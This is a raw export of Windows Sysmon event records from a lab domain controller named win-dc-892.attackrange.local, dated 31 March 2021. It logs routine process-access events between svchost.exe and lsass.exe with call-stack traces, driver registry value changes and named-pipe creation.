12:00:44.909{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001236Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.909{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 13241300x80000000000000001235Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 
12:00:44.909{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\lltdio\DriverMinorVersionDWORD (0x00000000) 13241300x80000000000000001234Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:44.909{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\lltdio\DriverMajorVersionDWORD (0x00000000) 13241300x80000000000000001233Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:44.909{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\lltdio\NdisMinorVersionDWORD (0x0000001e) 13241300x80000000000000001232Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:44.909{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\lltdio\NdisMajorVersionDWORD (0x00000006) 13241300x80000000000000001231Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:44.893{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\MsLldp\DriverMinorVersionDWORD (0x00000000) 13241300x80000000000000001230Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:44.893{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\MsLldp\DriverMajorVersionDWORD (0x0000000a) 13241300x80000000000000001229Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:44.893{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\MsLldp\NdisMinorVersionDWORD (0x0000001e) 13241300x80000000000000001228Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:44.893{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\MsLldp\NdisMajorVersionDWORD (0x00000006) 
17141700x80000000000000001227Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-CreatePipe2021-03-31 12:00:44.893{266CAFBE-646C-6064-0F00-00000000AE01}1116\Ctx_WinStation_API_serviceC:\Windows\System32\svchost.exe 17141700x80000000000000001226Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-CreatePipe2021-03-31 12:00:44.893{266CAFBE-646C-6064-0F00-00000000AE01}1116\TermSrv_API_serviceC:\Windows\System32\svchost.exe 10341000x80000000000000001225Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.893{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001224Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:44.893{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001223Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.877{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001222Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:44.877{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001221Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.877{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001220Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:44.862{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001219Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.862{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001218Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:44.862{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001217Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.862{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001216Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:44.846{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 13241300x80000000000000001215Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:44.846{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\xenfilt\Enum\NextInstanceDWORD (0x0000001f) 13241300x80000000000000001214Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:44.846{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\xenfilt\Enum\CountDWORD (0x0000001f) 13241300x80000000000000001213Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:44.846{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\xenfilt\Enum\30UMB\UMB\1&841921d&0&TERMINPUT_BUS 13241300x80000000000000001212Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:44.846{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\umbus\Enum\NextInstanceDWORD (0x00000002) 13241300x80000000000000001211Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 
12:00:44.846{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\umbus\Enum\CountDWORD (0x00000002) 13241300x80000000000000001210Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:44.846{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\umbus\Enum\1UMB\UMB\1&841921d&0&TERMINPUT_BUS 10341000x80000000000000001209Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.831{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001208Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:44.831{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001207Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.831{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-0E00-00000000AE01}1080C:\Windows\system32\LogonUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001206Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:44.831{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001205Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.831{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001204Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:44.831{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001203Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.831{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001202Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:44.831{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001201Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 